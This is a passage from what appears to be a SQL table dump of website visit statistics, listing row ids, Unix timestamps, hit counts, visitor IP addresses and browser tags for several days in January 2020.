62,1579098385,1,1,0,0,'46.211.243.58','chrome'),(475763,1579098387,1,1,0,0,'31.13.103.19','other'),(475764,1579099331,1,1,0,0,'178.154.171.134','other'),(475765,1579099790,1,1,0,0,'199.244.88.124','chrome'),(475766,1579099970,1,0,1,0,'66.249.64.27',''),(475767,1579099972,1,1,0,0,'66.249.64.26','chrome'),(475768,1579100777,1,1,0,0,'54.36.149.86','other'),(475769,1579101098,1,1,0,0,'141.8.142.2','other'),(475770,1579101140,2,2,0,0,'178.154.171.127','other'),(475771,1579102051,1,1,0,0,'91.196.178.80','chrome'),(475772,1579102326,1,1,0,0,'87.250.224.90','other'),(475773,1579102513,1,1,0,0,'178.154.171.134','other'),(475774,1579102596,1,1,0,0,'8.29.198.26','other'),(475775,1579103711,1,1,0,0,'207.46.13.69','other'),(475776,1579103978,2,2,0,0,'91.209.11.236','other'),(475777,1579105063,2,2,0,0,'91.209.11.236','other'),(475778,1579106002,1,1,0,0,'8.29.198.27','other'),(475779,1579106813,1,1,0,0,'207.46.13.143','other'),(475780,1579107465,1,1,0,0,'54.36.149.45','other'),(475781,1579108540,1,1,0,0,'54.36.149.88','other'),(475782,1579108606,2,0,2,0,'207.46.13.103',''),(475783,1579108841,1,1,0,0,'141.8.142.2','other'),(475784,1579109810,1,1,0,0,'91.216.3.34','chrome'),(475785,1579110036,1,1,0,0,'91.196.178.89','firefox'),(475786,1579110853,1,1,0,0,'178.154.171.134','other'),(475787,1579111283,1,1,0,0,'91.196.178.17','chrome'),(475788,1579111394,1,1,0,0,'54.214.136.232','chrome'),(475789,1579111397,1,1,0,0,'52.41.211.72','other'),(475790,1579111818,2,2,0,0,'207.46.13.167','other'),(475791,1579112093,1,1,0,0,'87.250.224.90','other'),(475792,1579112948,1,1,0,0,'66.249.70.33','chrome'),(475793,1579113353,1,1,0,0,'207.46.13.167','other'),(475794,1579113517,1,1,0,0,'8.29.198.27','other'),(475795,1579114129,1,1,0,0,'178.154.171.134','other'),(475796,1579114160,1,1,0,0,'141.8.142.2','other'),(475797,1579114584,1,1,0,0,'178.154.171.127','other'),(475798,1579115123,1,1,0,0,'54.36.149.10','other'),(475799,1579116294,1,1,0,0,'157.55.39.209','other'),(475800,1579117007,1,1,0,0,'8.29.198.27','other'),(475801,1579117305,1,1,0,0,'66.249.64.27','chrome'),(475802,1579118067,1,1,0,0,'54.36.149.92','other'),(475803,1579118305,1,1,0,0,'157.55.39.248','other'),(475804,1579118373,2,2,0,0,'66.249.64.26','chrome'),(475805,1579118375,2,2,0,0,'66.249.64.27','chrome'),(475806,1579118417,2,2,0,0,'66.249.64.28','chrome'),(475807,1579120262,1,1,0,0,'54.36.149.29','other'),(475808,1579120274,1,1,0,0,'54.36.149.12','other'),(475809,1579120636,1,1,0,0,'157.55.39.248','other'),(475810,1579121056,1,1,0,0,'141.8.183.73','other'),(475811,1579121423,1,1,0,0,'54.36.149.59','other'),(475812,1579123186,1,1,0,0,'157.55.39.191','other'),(475813,1579123216,1,1,0,0,'54.36.149.3','other'),(475814,1579124071,1,1,0,0,'66.249.64.26','chrome'),(475815,1579124447,1,1,0,0,'8.29.198.27','other'),(475816,1579125904,1,1,0,0,'54.36.149.32','other'),(475817,1579125983,1,1,0,0,'66.249.70.62','chrome'),(475818,1579127716,1,1,0,0,'66.249.64.26','chrome'),(475819,1579128066,1,1,0,0,'8.29.198.27','other'),(475820,1579129217,1,1,0,0,'54.36.149.107','other'),(475821,1579130066,1,1,0,0,'66.249.64.27','chrome'),(475822,1579130425,1,0,1,0,'157.55.39.187',''),(475823,1579130558,1,1,0,0,'178.154.171.134','other'),(475824,1579130590,1,1,0,0,'141.8.183.73','other'),(475825,1579131673,1,1,0,0,'54.36.149.69','other'),(475826,1579132198,1,1,0,0,'157.55.39.146','other'),(475827,1579132995,1,1,0,0,'92.63.111.27','firefox'),(475828,1579133877,1,1,0,0,'66.249.64.27','chrome'),(475829,1579135088,1,1,0,0,'66.249.64.227','chrome'),(475830,1579135379,1,1,0,0,'8.29.198.27','other'),(475831,1579135996,1,1,0,0,'66.249.64.222','chrome'),(475832,1579136114,1,1,0,0,'62.205.134.182','other'),(475833,1579138438,1,1,0,0,'54.36.149.101','other'),(475834,1579139939,1,1,0,0,'54.36.149.49','other'),(475835,1579140434,2,2,0,0,'66.249.64.28','chrome'),(475836,1579141662,1,1,0,0,'207.46.13.210','other'),(475837,1579141827,1,1,0,0,'95.216.96.254','other'),(475838,1579142291,1,1,0,0,'66.249.70.33','chrome'),(475839,1579142331,1,1,0,0,'66.249.64.26','chrome'),(475840,1579143591,1,1,0,0,'54.36.149.99','other'),(475841,1579143714,1,1,0,0,'141.8.132.9','other'),(475842,1579146280,1,1,0,0,'8.29.198.25','other'),(475843,1579148655,1,1,0,0,'31.13.103.9','other'),(475844,1579148657,1,1,0,0,'31.13.103.10','other'),(475845,1579149608,1,1,0,0,'54.36.149.65','other'),(475846,1579150050,1,1,0,0,'66.249.64.26','chrome'),(475847,1579150513,1,0,1,0,'157.55.39.167',''),(475848,1579150565,1,1,0,0,'34.69.233.70','firefox'),(475849,1579151132,1,1,0,0,'54.36.149.33','other'),(475850,1579151869,1,1,0,0,'66.249.64.28','chrome'),(475851,1579152359,1,1,0,0,'54.36.149.9','other'),(475852,1579153412,1,1,0,0,'62.205.134.182','other'),(475853,1579153802,1,1,0,0,'66.249.64.26','chrome'),(475854,1579153898,1,1,0,0,'66.249.64.27','chrome'),(475855,1579153910,1,1,0,0,'66.249.70.33','chrome'),(475856,1579154063,1,0,1,0,'157.55.39.172',''),(475857,1579154186,2,2,0,0,'51.68.152.26','chrome'),(475858,1579154948,1,1,0,0,'54.36.149.75','other'),(475859,1579156514,2,2,0,0,'31.13.127.14','other'),(475860,1579156515,1,1,0,0,'31.13.127.1','other'),(475863,1579156570,1,1,0,0,'54.36.149.47','other'),(475864,1579157183,1,1,0,0,'8.29.198.27','other'),(475865,1579158564,1,1,0,0,'141.8.183.53','other'),(475866,1579158650,1,1,0,0,'54.36.149.88','other'),(475867,1579159194,1,1,0,0,'54.36.149.18','other'),(475868,1579159215,1,1,0,0,'95.91.241.71','firefox'),(475869,1579159676,1,1,0,0,'66.249.64.26','chrome'),(475870,1579160785,1,1,0,0,'54.36.149.7','other'),(475871,1579161682,1,1,0,0,'157.55.39.74','other'),(475872,1579162005,1,1,0,0,'66.249.64.27','chrome'),(475873,1579162837,1,1,0,0,'31.13.127.9','other'),(475874,1579162838,1,1,0,0,'31.13.127.5','other'),(475877,1579163877,1,1,0,0,'54.36.149.17','other'),(475878,1579163971,1,1,0,0,'54.36.149.65','other'),(475879,1579164012,1,1,0,0,'66.249.64.28','chrome'),(475880,1579164127,1,1,0,0,'46.211.240.50','chrome'),(475881,1579164457,1,1,0,0,'54.36.149.21','other'),(475882,1579167492,1,1,0,0,'87.250.224.90','other'),(475883,1579167525,1,1,0,0,'34.204.196.13','chrome'),(475884,1579168070,1,1,0,0,'8.29.198.26','other'),(475885,1579168726,1,1,0,0,'185.138.228.27','chrome'),(475886,1579168882,1,1,0,0,'46.211.141.45','chrome'),(475887,1579170364,1,1,0,0,'54.36.149.63','other'),(475888,1579170435,1,1,0,0,'66.102.9.161','chrome'),(475889,1579170810,1,1,0,0,'91.196.178.19','chrome'),(475890,1579171340,28,28,0,0,'95.216.1.46','other'),(475891,1579171498,1,1,0,0,'91.196.178.76','chrome'),(475892,1579171500,1,1,0,0,'91.196.177.46','chrome'),(475893,1579171511,1,1,0,0,'93.183.247.211','firefox'),(475894,1579172231,1,1,0,0,'176.111.33.18','firefox'),(475895,1579173013,1,1,0,0,'54.36.149.4','other'),(475896,1579173258,1,1,0,0,'66.249.64.27','chrome'),(475897,1579173327,1,1,0,0,'46.133.24.250','chrome'),(475898,1579173674,1,1,0,0,'54.36.149.79','other'),(475899,1579174088,1,1,0,0,'37.9.113.142','other'),(475900,1579174842,1,1,0,0,'91.229.216.7','chrome'),(475901,1579175396,1,1,0,0,'87.250.224.104','other'),(475902,1579175485,1,1,0,0,'109.74.154.72','chrome'),(475903,1579175505,1,1,0,0,'54.36.149.63','other'),(475904,1579175895,1,1,0,0,'54.36.149.28','other'),(475905,1579175978,1,1,0,0,'208.113.153.216','chrome'),(475906,1579176468,1,1,0,0,'95.108.181.103','other'),(475907,1579178151,1,1,0,0,'91.196.178.81','chrome'),(475908,1579178404,1,1,0,0,'54.36.149.14','other'),(475909,1579179004,1,1,0,0,'8.29.198.27','other'),(475910,1579179948,3,3,0,0,'108.179.242.120','chrome'),(475911,1579180689,1,1,0,0,'91.196.178.76','chrome'),(475912,1579181062,3,3,0,0,'213.180.203.124','other'),(475913,1579182013,1,1,0,0,'46.133.24.250','chrome'),(475914,1579184263,1,1,0,0,'91.196.178.81','chrome'),(475915,1579185720,3,3,0,0,'46.200.205.43','chrome'),(475916,1579186193,1,1,0,0,'37.55.44.82','chrome'),(475917,1579186428,1,1,0,0,'91.196.177.46','chrome'),(475918,1579186447,1,1,0,0,'91.196.178.184','chrome'),(475919,1579187916,1,1,0,0,'95.28.190.165','chrome'),(475920,1579188082,2,2,0,0,'157.55.39.172','other'),(475921,1579188427,1,1,0,0,'141.8.188.25','other'),(475922,1579188479,1,1,0,0,'51.38.53.70','chrome'),(475923,1579188522,1,1,0,0,'207.46.13.201','other'),(475924,1579188923,1,1,0,0,'138.246.253.5','chrome'),(475925,1579189925,1,1,0,0,'8.29.198.26','other'),(475926,1579190033,1,1,0,0,'213.180.203.185','other'),(475927,1579192063,1,1,0,0,'93.124.39.2','chrome'),(475928,1579194510,1,1,0,0,'66.249.64.27','chrome'),(475929,1579194738,1,1,0,0,'66.249.70.33','chrome'),(475930,1579194977,4,4,0,0,'3.226.122.208','other'),(475931,1579200174,1,1,0,0,'37.9.113.202','other'),(475932,1579200671,1,1,0,0,'95.108.181.103','other'),(475933,1579200674,1,1,0,0,'141.8.132.28','other'),(475934,1579200803,1,1,0,0,'8.29.198.25','other'),(475935,1579202804,1,1,0,0,'149.202.240.207','chrome'),(475936,1579203486,1,1,0,0,'31.13.127.12','other'),(475937,1579203487,1,1,0,0,'31.13.127.25','other'),(475938,1579203613,3,3,0,0,'66.249.64.26','chrome'),(475939,1579203759,1,1,0,0,'66.249.64.27','chrome'),(475940,1579204693,1,0,1,0,'66.249.70.36',''),(475941,1579204831,1,1,0,0,'66.249.64.26','chrome'),(475942,1579205355,1,1,0,0,'34.197.76.213','chrome'),(475943,1579206332,1,1,0,0,'178.154.171.7','other'),(475944,1579206379,2,2,0,0,'157.55.39.8','other'),(475945,1579206750,1,1,0,0,'66.249.64.26','chrome'),(475946,1579208271,1,1,0,0,'207.46.13.240','other'),(475947,1579211703,1,1,0,0,'8.29.198.27','other'),(475948,1579213256,1,1,0,0,'5.45.207.65','other'),(475949,1579213641,1,1,0,0,'207.46.13.75','other'),(475950,1579214091,1,1,0,0,'185.98.7.126','chrome'),(475951,1579214497,1,1,0,0,'138.246.253.5','chrome'),(475952,1579215104,1,1,0,0,'207.46.13.232','other'),(475953,1579215615,2,2,0,0,'207.46.13.47','other'),(475954,1579221632,1,1,0,0,'54.218.113.190','chrome'),(475955,1579221635,1,1,0,0,'52.34.24.33','other'),(475956,1579222097,2,2,0,0,'132.148.97.72','chrome'),(475957,1579222515,1,1,0,0,'62.205.134.182','other'),(475958,1579222573,1,1,0,0,'8.29.198.27','other'),(475959,1579222709,1,1,0,0,'141.8.188.12','other'),(475960,1579227695,1,1,0,0,'141.8.183.100','other'),(475961,1579228531,2,2,0,0,'51.15.72.153','chrome'),(475962,1579228561,1,1,0,0,'74.208.56.254','chrome'),(475963,1579228923,1,1,0,0,'95.108.181.103','other'),(475964,1579230982,1,1,0,0,'8.29.198.27','other'),(475965,1579231340,1,1,0,0,'37.9.113.202','other'),(475966,1579231651,1,0,1,0,'157.55.39.226',''),(475967,1579232167,1,0,1,0,'157.55.39.222',''),(475968,1579233082,1,1,0,0,'66.249.64.26','chrome'),(475969,1579233458,1,1,0,0,'8.29.198.27','other'),(475970,1579233771,1,1,0,0,'37.9.113.202','other'),(475971,1579234092,1,1,0,0,'141.8.183.73','other'),(475972,1579234822,1,1,0,0,'141.8.132.28','other'),(475973,1579236488,1,1,0,0,'46.30.40.94','chrome'),(475974,1579239763,1,1,0,0,'62.205.134.182','other'),(475975,1579240260,1,1,0,0,'157.55.39.111','other'),(475976,1579241955,1,1,0,0,'8.29.198.25','other'),(475977,1579242516,1,1,0,0,'207.46.13.187','other'),(475978,1579242525,1,1,0,0,'141.8.188.39','other'),(475979,1579244339,1,1,0,0,'8.29.198.26','other'),(475980,1579244937,1,1,0,0,'5.255.253.8','other'),(475981,1579245131,1,1,0,0,'146.185.184.69','chrome'),(475982,1579246258,2,2,0,0,'91.209.11.236','other'),(475983,1579246474,1,1,0,0,'91.196.177.193','chrome'),(475984,1579246510,1,1,0,0,'157.55.39.56','other'),(475985,1579247118,1,1,0,0,'66.249.70.62','chrome'),(475986,1579247294,2,2,0,0,'91.209.11.236','other'),(475987,1579247329,1,1,0,0,'91.196.178.184','chrome'),(475988,1579247555,1,1,0,0,'141.8.132.37','other'),(475989,1579247722,1,1,0,0,'46.211.240.50','chrome'),(475990,1579247804,1,1,0,0,'157.55.39.220','other'),(475991,1579248909,1,0,1,0,'66.249.70.36',''),(475992,1579249525,1,1,0,0,'141.8.183.33','other'),(475993,1579249593,1,1,0,0,'91.196.177.46','chrome'),(475994,1579250514,1,1,0,0,'78.106.161.194','other'),(475995,1579251675,2,2,0,0,'178.154.171.134','other'),(475996,1579252075,1,1,0,0,'35.214.175.223','chrome'),(475997,1579252937,1,1,0,0,'8.29.198.25','other'),(475998,1579252940,1,1,0,0,'34.239.155.194','chrome'),(475999,1579254621,1,1,0,0,'157.55.39.8','other'),(476000,1579254945,1,1,0,0,'91.196.178.81','chrome'),(476001,1579255210,1,1,0,0,'8.29.198.27','other'),(476002,1579255607,3,3,0,0,'51.15.72.153','chrome'),(476003,1579255699,2,2,0,0,'31.13.127.15','other'),(476004,1579255700,1,1,0,0,'31.13.127.17','other'),(476006,1579256584,1,1,0,0,'178.133.112.124','chrome'),(476007,1579258967,1,1,0,0,'31.13.127.22','other'),(476008,1579258968,1,1,0,0,'31.13.127.6','other'),(476009,1579259251,1,1,0,0,'141.8.142.2','other'),(476010,1579262163,1,1,0,0,'109.74.154.72','chrome'),(476011,1579263915,1,1,0,0,'8.29.198.27','other'),(476012,1579265439,1,1,0,0,'209.17.97.58','other'),(476013,1579266096,1,1,0,0,'8.29.198.27','other'),(476014,1579266184,1,1,0,0,'91.196.178.70','firefox'),(476015,1579267494,1,1,0,0,'209.17.97.34','other'),(476016,1579268880,1,1,0,0,'46.211.143.250','chrome'),(476017,1579269295,1,1,0,0,'91.124.182.170','chrome'),(476018,1579269918,1,1,0,0,'91.196.178.76','chrome'),(476019,1579270708,1,1,0,0,'91.124.182.170','chrome'),(476020,1579270815,2,2,0,0,'46.30.40.94','chrome'),(476021,1579271219,2,2,0,0,'51.68.11.223','chrome'),(476022,1579272799,3,3,0,0,'157.55.39.135','other'),(476023,1579273925,1,1,0,0,'37.9.113.200','other'),(476024,1579274919,1,1,0,0,'8.29.198.25','other'),(476025,1579276745,2,2,0,0,'66.249.64.26','chrome'),(476026,1579276966,1,1,0,0,'8.29.198.27','other'),(476027,1579276971,1,1,0,0,'34.222.34.225','chrome'),(476028,1579276974,1,1,0,0,'52.41.211.72','other'),(476029,1579277803,2,2,0,0,'192.227.143.46','chrome'),(476030,1579277845,1,1,0,0,'66.249.64.26','chrome'),(476031,1579280659,1,1,0,0,'37.9.113.163','other'),(476032,1579281404,1,1,0,0,'89.253.231.184','chrome'),(476033,1579282658,1,1,0,0,'93.159.230.28','chrome'),(476034,1579282706,3,3,0,0,'199.116.77.18','chrome'),(476035,1579283334,1,1,0,0,'37.9.113.10','other'),(476036,1579283495,1,1,0,0,'91.196.178.30','chrome'),(476037,1579284487,2,2,0,0,'51.68.11.207','chrome'),(476038,1579284724,2,2,0,0,'66.249.64.28','chrome'),(476039,1579284752,3,3,0,0,'66.249.64.26','chrome'),(476040,1579284901,1,1,0,0,'66.249.64.27','chrome'),(476041,1579284903,1,1,0,0,'66.249.70.33','chrome'),(476042,1579285917,1,1,0,0,'8.29.198.25','other'),(476043,1579286054,3,3,0,0,'51.68.11.223','chrome'),(476044,1579286362,1,1,0,0,'31.13.127.24','other'),(476045,1579286363,1,1,0,0,'31.13.127.7','other'),(476046,1579286428,1,1,0,0,'91.196.178.177','chrome'),(476047,1579286880,1,1,0,0,'87.250.224.90','other'),(476048,1579287528,2,1,1,0,'66.249.64.27',''),(476049,1579287881,1,1,0,0,'8.29.198.27','other'),(476050,1579287926,1,1,0,0,'31.14.103.240','chrome'),(476051,1579288318,1,1,0,0,'128.124.231.239','chrome'),(476052,1579288322,2,2,0,0,'107.178.194.172','chrome'),(476053,1579288373,1,0,1,0,'157.55.39.73',''),(476054,1579289624,1,1,0,0,'66.249.70.36','chrome'),(476055,1579289650,2,2,0,0,'91.196.178.86','chrome'),(476056,1579290584,1,1,0,0,'66.249.70.36','chrome'),(476057,1579291054,1,1,0,0,'67.227.152.219','chrome'),(476058,1579291089,2,2,0,0,'51.68.11.207','chrome'),(476059,1579291545,1,1,0,0,'91.196.178.78','firefox'),(476060,1579292412,1,1,0,0,'37.52.23.130','chrome'),(476061,1579294093,2,2,0,0,'149.202.240.207','chrome'),(476062,1579294258,1,1,0,0,'185.210.217.4','chrome'),(476063,1579294369,1,1,0,0,'94.130.53.35','other'),(476064,1579294511,1,1,0,0,'217.182.175.162','chrome'),(476065,1579295705,1,1,0,0,'66.249.64.26','chrome'),(476066,1579296214,1,1,0,0,'207.46.13.106','other'),(476067,1579296903,1,1,0,0,'8.29.198.27','other'),(476068,1579297180,1,1,0,0,'66.249.64.27','chrome'),(476069,1579298112,1,1,0,0,'66.249.64.26','chrome'),(476070,1579298763,1,1,0,0,'8.29.198.27','other'),(476071,1579300063,1,1,0,0,'178.154.171.127','other'),(476072,1579300161,1,1,0,0,'66.249.64.26','chrome'),(476073,1579300714,1,1,0,0,'157.55.39.73','other'),(476074,1579301196,1,1,0,0,'141.8.142.2','other'),(476075,1579301345,1,0,1,0,'157.55.39.166',''),(476076,1579301894,1,1,0,0,'91.122.30.68','chrome'),(476077,1579302407,1,1,0,0,'178.154.171.127','other'),(476078,1579304001,1,1,0,0,'157.55.39.73','other'),(476079,1579304936,3,3,0,0,'207.46.13.226','other'),(476080,1579304964,1,1,0,0,'141.8.142.2','other'),(476081,1579305034,1,1,0,0,'157.55.39.73','other'),(476082,1579305568,1,1,0,0,'91.196.178.86','chrome'),(476083,1579305870,1,1,0,0,'207.46.13.135','other'),(476084,1579305934,2,2,0,0,'205.186.176.21','chrome'),(476085,1579306556,1,0,1,0,'207.46.13.26',''),(476086,1579306653,1,1,0,0,'207.46.13.226','other'),(476087,1579307454,1,1,0,0,'178.254.0.121','chrome'),(476088,1579307514,1,1,0,0,'141.8.142.2','other'),(476089,1579307861,1,1,0,0,'8.29.198.25','other'),(476090,1579308443,1,1,0,0,'178.154.171.127','other'),(476091,1579308912,1,1,0,0,'62.205.134.182','other'),(476092,1579309456,2,2,0,0,'178.154.171.134','other'),(476093,1579309629,1,1,0,0,'8.29.198.25','other'),(476094,1579310618,1,1,0,0,'84.54.12.246','chrome'),(476095,1579312452,1,1,0,0,'207.46.13.135','other'),(476096,1579315354,1,1,0,0,'207.46.13.135','other'),(476097,1579316086,1,1,0,0,'54.201.244.12','chrome'),(476098,1579318684,1,1,0,0,'178.154.171.127','other'),(476099,1579318791,1,1,0,0,'8.29.198.25','other'),(476100,1579319783,1,1,0,0,'141.8.142.2','other'),(476101,1579319787,2,2,0,0,'178.154.171.134','other'),(476102,1579320486,1,1,0,0,'8.29.198.26','other'),(476103,1579320845,1,1,0,0,'37.9.113.97','other'),(476104,1579321342,1,1,0,0,'66.249.64.28','chrome'),(476105,1579323829,1,1,0,0,'178.154.171.134','other'),(476106,1579326078,2,2,0,0,'178.154.171.134','other'),(476107,1579326327,1,1,0,0,'62.205.134.182','other'),(476108,1579327327,1,1,0,0,'178.154.171.134','other'),(476109,1579329614,1,1,0,0,'66.249.64.26','chrome'),(476110,1579329677,1,1,0,0,'178.154.171.127','other'),(476111,1579329687,1,1,0,0,'8.29.198.25','other'),(476112,1579330839,1,1,0,0,'5.45.207.65','other'),(476113,1579331342,1,1,0,0,'8.29.198.25','other'),(476114,1579335233,2,2,0,0,'192.185.81.123','chrome'),(476115,1579335285,1,1,0,0,'207.46.13.103','other'),(476116,1579335917,1,1,0,0,'128.124.231.239','chrome'),(476117,1579336135,1,1,0,0,'195.161.41.204','chrome'),(476118,1579336395,1,1,0,0,'178.154.171.134','other'),(476119,1579337543,1,1,0,0,'141.8.188.25','other'),(476120,1579339552,1,1,0,0,'141.8.132.12','other'),(476121,1579339795,1,1,0,0,'141.8.142.50','other'),(476122,1579340597,1,1,0,0,'8.29.198.26','other'),(476123,1579340642,1,1,0,0,'178.208.83.17','chrome'),(476124,1579341059,1,1,0,0,'66.249.64.28','chrome'),(476125,1579341801,1,1,0,0,'178.154.171.134','other'),(476126,1579342208,1,1,0,0,'8.29.198.26','other'),(476127,1579342486,1,1,0,0,'31.13.127.2','other'),(476128,1579343659,1,1,0,0,'207.46.13.97','other'),(476129,1579345958,1,1,0,0,'157.55.39.81','other'),(476130,1579346179,1,1,0,0,'178.154.171.134','other'),(476131,1579346220,1,1,0,0,'178.154.171.127','other'),(476132,1579346814,1,1,0,0,'109.74.154.72','chrome'),(476133,1579347052,1,1,0,0,'193.106.30.99','firefox'),(476134,1579347418,1,1,0,0,'141.8.142.2','other'),(476135,1579347536,1,1,0,0,'207.46.13.177','other'),(476136,1579348495,1,1,0,0,'66.249.64.28','chrome'),(476137,1579348519,1,1,0,0,'178.154.171.134','other'),(476138,1579348581,2,2,0,0,'157.55.39.127','other'),(476139,1579349165,2,1,1,0,'157.55.39.226',''),(476140,1579350692,2,2,0,0,'207.46.13.67','other'),(476141,1579350837,1,1,0,0,'178.154.171.134','other'),(476142,1579351500,1,1,0,0,'8.29.198.25','other'),(476143,1579351971,1,1,0,0,'142.4.218.156','other'),(476144,1579352002,1,1,0,0,'142.4.218.156','chrome'),(476145,1579352019,1,1,0,0,'51.91.218.19','other'),(476146,1579353063,1,1,0,0,'8.29.198.27','other'),(476147,1579358134,1,1,0,0,'5.35.64.203','chrome'),(476148,1579358276,2,2,0,0,'128.78.109.155','chrome'),(476149,1579358974,1,1,0,0,'141.8.142.2','other'),(476150,1579360457,1,1,0,0,'178.154.171.134','other'),(476151,1579361607,3,3,0,0,'104.198.165.226','chrome'),(476152,1579361653,5,5,0,0,'146.148.96.72','chrome'),(476153,1579361675,3,3,0,0,'104.154.117.183','chrome'),(476154,1579361685,1,1,0,0,'34.66.56.178','chrome'),(476156,1579362331,1,1,0,0,'66.249.70.33','chrome'),(476157,1579362388,1,1,0,0,'8.29.198.27','other'),(476158,1579362748,1,1,0,0,'178.154.171.134','other'),(476159,1579363915,1,1,0,0,'8.29.198.27','other'),(476160,1579364169,1,1,0,0,'178.154.171.134','other'),(476161,1579364768,2,2,0,0,'51.68.11.215','chrome'),(476162,1579364998,1,1,0,0,'178.154.171.127','other'),(476163,1579365562,1,1,0,0,'204.11.58.33','chrome'),(476164,1579366843,1,1,0,0,'93.124.39.2','chrome'),(476165,1579367280,1,1,0,0,'66.249.64.27','chrome'),(476166,1579369361,2,2,0,0,'51.68.11.239','chrome'),(476167,1579370174,1,1,0,0,'51.68.11.231','chrome'),(476168,1579370283,1,1,0,0,'17.58.101.25','other'),(476169,1579371109,1,1,0,0,'64.90.48.203','chrome'),(476170,1579372842,1,1,0,0,'66.249.89.28','other'),(476171,1579372843,1,1,0,0,'66.249.89.26','other'),(476172,1579372864,1,1,0,0,'170.244.92.15','chrome'),(476173,1579373264,1,1,0,0,'8.29.198.27','other'),(476174,1579374779,1,1,0,0,'8.29.198.27','other'),(476175,1579375607,1,1,0,0,'91.208.99.2','chrome'),(476176,1579377009,2,2,0,0,'207.46.13.196','other'),(476177,1579377093,1,1,0,0,'46.211.129.138','chrome'),(476178,1579377579,1,1,0,0,'66.249.64.26','chrome'),(476179,1579378069,2,0,2,0,'157.55.39.163',''),(476180,1579380241,3,0,3,0,'66.249.70.62',''),(476181,1579382902,1,0,1,0,'157.55.39.250',''),(476182,1579382951,1,1,0,0,'178.154.171.134','other'),(476183,1579382963,1,0,1,0,'207.46.13.195',''),(476184,1579384146,1,1,0,0,'8.29.198.26','other'),(476185,1579385629,1,1,0,0,'8.29.198.25','other'),(476186,1579387652,2,0,2,0,'207.46.13.56',''),(476187,1579388164,1,1,0,0,'178.154.171.134','other'),(476188,1579388969,2,2,0,0,'212.58.21.242','chrome'),(476189,1579389366,1,1,0,0,'178.154.171.134','other'),(476190,1579390464,1,1,0,0,'178.154.171.134','other'),(476191,1579390665,1,1,0,0,'18.188.149.23','chrome'),(476192,1579391733,1,1,0,0,'178.154.171.127','other'),(476193,1579392510,2,2,0,0,'51.68.11.223','chrome'),(476194,1579394418,1,1,0,0,'178.154.171.127','other'),(476195,1579395012,1,1,0,0,'8.29.198.26','other'),(476196,1579395314,1,1,0,0,'62.205.134.182','other'),(476197,1579395670,1,1,0,0,'51.68.11.223','chrome'),(476198,1579396480,1,1,0,0,'8.29.198.27','other'),(476199,1579396938,2,2,0,0,'51.68.11.207','chrome'),(476200,1579400250,1,1,0,0,'5.45.207.44','other'),(476201,1579401393,1,1,0,0,'207.46.13.137','other'),(476202,1579401562,1,1,0,0,'141.8.142.164','other'),(476203,1579401586,1,1,0,0,'141.8.142.50','other'),(476204,1579402530,1,1,0,0,'37.9.113.202','other'),(476205,1579404144,1,1,0,0,'52.12.116.124','chrome'),(476206,1579404148,1,1,0,0,'52.34.24.33','other'),(476207,1579404728,1,1,0,0,'178.154.171.134','other'),(476208,1579405688,1,1,0,0,'178.154.171.127','other'),(476209,1579405871,1,1,0,0,'8.29.198.27','other'),(476210,1579405888,1,1,0,0,'157.55.39.54','other'),(476211,1579406213,1,0,1,0,'207.46.13.68',''),(476212,1579407137,1,1,0,0,'157.55.39.73','other'),(476213,1579407348,1,1,0,0,'8.29.198.25','other'),(476214,1579407739,2,2,0,0,'51.68.11.207','chrome'),(476215,1579408865,1,0,1,0,'157.55.39.210',''),(476216,1579410286,1,1,0,0,'157.55.39.210','other'),(476217,1579410553,1,1,0,0,'178.154.171.127','other'),(476218,1579410556,1,1,0,0,'178.154.171.134','other'),(476219,1579411694,1,1,0,0,'178.154.171.134','other'),(476220,1579411968,1,1,0,0,'66.249.64.26','chrome'),(476221,1579412826,1,1,0,0,'62.205.134.182','other'),(476222,1579414224,2,2,0,0,'178.154.171.134','other'),(476223,1579415604,1,1,0,0,'178.154.171.134','other'),(476224,1579416113,1,1,0,0,'178.154.171.127','other'),(476225,1579416721,2,2,0,0,'178.154.171.134','other'),(476226,1579416733,1,1,0,0,'8.29.198.25','other'),(476227,1579416821,1,1,0,0,'78.106.161.194','other'),(476228,1579416843,1,1,0,0,'91.209.11.236','other'),(476229,1579417680,1,1,0,0,'178.154.171.134','other'),(476230,1579418191,1,1,0,0,'8.29.198.27','other'),(476231,1579420206,1,1,0,0,'157.55.39.88','other'),(476232,1579421294,2,2,0,0,'157.55.39.88','other'),(476233,1579422088,1,1,0,0,'178.133.15.47','chrome'),(476234,1579422825,1,1,0,0,'66.249.64.27','chrome'),(476235,1579422940,1,1,0,0,'31.13.127.14','other'),(476236,1579422941,1,1,0,0,'31.13.127.20','other'),(476239,1579424949,1,1,0,0,'141.8.188.20','other'),(476240,1579424971,1,1,0,0,'37.9.113.177','other'),(476241,1579426002,1,1,0,0,'46.211.144.215','chrome'),(476242,1579426085,1,1,0,0,'141.8.142.119','other'),(476243,1579426581,1,1,0,0,'111.231.69.203','firefox'),(476244,1579427301,1,1,0,0,'141.8.132.28','other'),(476245,1579427594,1,1,0,0,'8.29.198.25','other'),(476246,1579428012,2,2,0,0,'5.9.156.30','other'),(476247,1579428102,1,1,0,0,'207.46.13.249','other'),(476248,1579429030,1,1,0,0,'8.29.198.27','other'),(476249,1579429677,1,1,0,0,'178.154.171.127','other'),(476250,1579431772,1,1,0,0,'178.154.171.134','other'),(476251,1579432618,1,1,0,0,'109.74.154.72','chrome'),(476252,1579437325,1,1,0,0,'141.8.142.119','other'),(476253,1579437475,1,1,0,0,'5.45.207.43','other'),(476254,1579438468,1,1,0,0,'8.29.198.25','other'),(476255,1579438987,1,1,0,0,'188.163.37.2','chrome'),(476256,1579439873,1,1,0,0,'8.29.198.27','other'),(476257,1579442491,1,1,0,0,'31.13.127.19','other'),(476258,1579442492,1,1,0,0,'31.13.127.3','other'),(476259,1579442895,1,1,0,0,'141.8.132.28','other'),(476260,1579442909,1,1,0,0,'95.108.213.61','other'),(476261,1579445883,1,1,0,0,'178.133.232.71','chrome'),(476262,1579446689,1,1,0,0,'178.154.171.134','other'),(476263,1579447834,1,1,0,0,'178.154.171.134','other'),(476264,1579448011,1,1,0,0,'178.154.171.127','other'),(476265,1579448690,1,1,0,0,'188.163.21.78','firefox'),(476266,1579448962,1,1,0,0,'87.250.224.90','other'),(476267,1579449309,1,1,0,0,'8.29.198.27','other'),(476268,1579449316,1,1,0,0,'207.46.13.172','other'),(476269,1579450714,1,1,0,0,'8.29.198.25','other'),(476270,1579451024,1,1,0,0,'94.153.103.108','chrome'),(476271,1579451459,1,1,0,0,'94.153.104.158','chrome'),(476272,1579452143,1,0,1,0,'207.46.13.214',''),(476273,1579452904,1,1,0,0,'178.154.171.40','other'),(476274,1579454214,1,1,0,0,'5.9.156.30','other'),(476275,1579454825,1,1,